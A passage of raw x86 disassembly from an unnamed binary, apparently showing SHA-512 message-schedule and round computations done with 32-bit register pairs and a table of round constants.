		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_D0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		mov	[eax+88h], ecx
		mov	[eax+8Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_118], ecx
		mov	[esp+170h+var_114], eax
		mov	[esp+170h+var_48], ecx
		jmp	short loc_415E50
; ---------------------------------------------------------------------------

loc_415E41:				; CODE XREF: sub_414BC0+1196j
		mov	edx, [esp+170h+var_118]
		mov	eax, [esp+170h+var_114]
		mov	[esp+170h+var_48], edx

loc_415E50:				; CODE XREF: sub_414BC0+127Fj
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_44], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA30[eax*8]
		adc	esi, ds:dword_41FA34[eax*8]
		add	edx, [esp+170h+var_48]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_44]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		and	eax, [esp+170h+var_13C]
		and	ebp, [esp+170h+var_144]
		and	ecx, edx
		xor	ebx, ecx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		adc	[esp+170h+var_154], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41608B
		mov	eax, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+90h], ecx
		mov	[eax+94h], edx
		mov	eax, edx
		mov	[esp+170h+var_C8], ecx
		mov	[esp+170h+var_C4], eax
		mov	[esp+170h+var_80], ecx
		jmp	short loc_4160A0
; ---------------------------------------------------------------------------

loc_41608B:				; CODE XREF: sub_414BC0+13D4j
		mov	edx, [esp+170h+var_C8]
		mov	eax, [esp+170h+var_C4]
		mov	[esp+170h+var_80], edx

loc_4160A0:				; CODE XREF: sub_414BC0+14C9j
		mov	ecx, [esp+170h+var_134]
		mov	ebx, ecx
		mov	[esp+170h+var_7C], eax
		mov	eax, [esp+170h+var_138]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	ebx
		and	ebx, [esp+170h+var_124]
		not	edi
		and	edi, [esp+170h+var_128]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA38[eax*8]
		adc	esi, ds:dword_41FA3C[eax*8]
		add	edx, [esp+170h+var_80]
		mov	eax, [esp+170h+var_120]
		adc	esi, [esp+170h+var_7C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_158]
		mov	eax, [esp+170h+var_154]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_158]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_150]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_158]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		mov	ecx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4162D1
		mov	eax, [esp+170h+var_E8]
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_118]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+98h], ecx
		mov	[eax+9Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_F0], ecx
		mov	[esp+170h+var_EC], eax
		mov	[esp+170h+var_78], ecx
		jmp	short loc_4162E6
; ---------------------------------------------------------------------------

loc_4162D1:				; CODE XREF: sub_414BC0+1626j
		mov	edx, [esp+170h+var_F0]
		mov	eax, [esp+170h+var_EC]
		mov	[esp+170h+var_78], edx

loc_4162E6:				; CODE XREF: sub_414BC0+170Fj
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_74], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA40[eax*8]
		adc	esi, ds:dword_41FA44[eax*8]
		add	edx, [esp+170h+var_78]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_74]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416519
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		mov	[eax+0A0h], ecx
		mov	[eax+0A4h], edx
		mov	eax, edx
		mov	[esp+170h+var_E8], ecx
		mov	[esp+170h+var_E4], eax
		mov	[esp+170h+var_68], ecx
		jmp	short loc_41652E
; ---------------------------------------------------------------------------

loc_416519:				; CODE XREF: sub_414BC0+1868j
		mov	edx, [esp+170h+var_E8]
		mov	eax, [esp+170h+var_E4]
		mov	[esp+170h+var_68], edx

loc_41652E:				; CODE XREF: sub_414BC0+1957j
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_64], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA48[eax*8]
		adc	esi, ds:dword_41FA4C[eax*8]
		add	edx, [esp+170h+var_68]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_64]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416761
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		mov	[eax+0A8h], ecx
		mov	[eax+0ACh], edx
		mov	eax, edx
		mov	[esp+170h+var_F8], ecx
		mov	[esp+170h+var_F4], eax
		mov	[esp+170h+var_50], ecx
		jmp	short loc_416770
; ---------------------------------------------------------------------------

loc_416761:				; CODE XREF: sub_414BC0+1AB0j
		mov	edx, [esp+170h+var_F8]
		mov	eax, [esp+170h+var_F4]
		mov	[esp+170h+var_50], edx

loc_416770:				; CODE XREF: sub_414BC0+1B9Fj
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_4C], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA50[eax*8]
		adc	esi, ds:dword_41FA54[eax*8]
		add	edx, [esp+170h+var_50]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_4C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4169B3
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_E8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_E8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		mov	[eax+0B0h], ecx
		mov	[eax+0B4h], edx
		mov	eax, edx
		mov	[esp+170h+var_B0], ecx
		mov	[esp+170h+var_AC], eax
		mov	[esp+170h+var_40], ecx
		jmp	short loc_4169C8
; ---------------------------------------------------------------------------

loc_4169B3:				; CODE XREF: sub_414BC0+1CF6j
		mov	edx, [esp+170h+var_B0]
		mov	eax, [esp+170h+var_AC]
		mov	[esp+170h+var_40], edx

loc_4169C8:				; CODE XREF: sub_414BC0+1DF1j
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_3C], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA58[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_41FA5C[eax*8]
		add	edx, [esp+170h+var_40]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_3C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
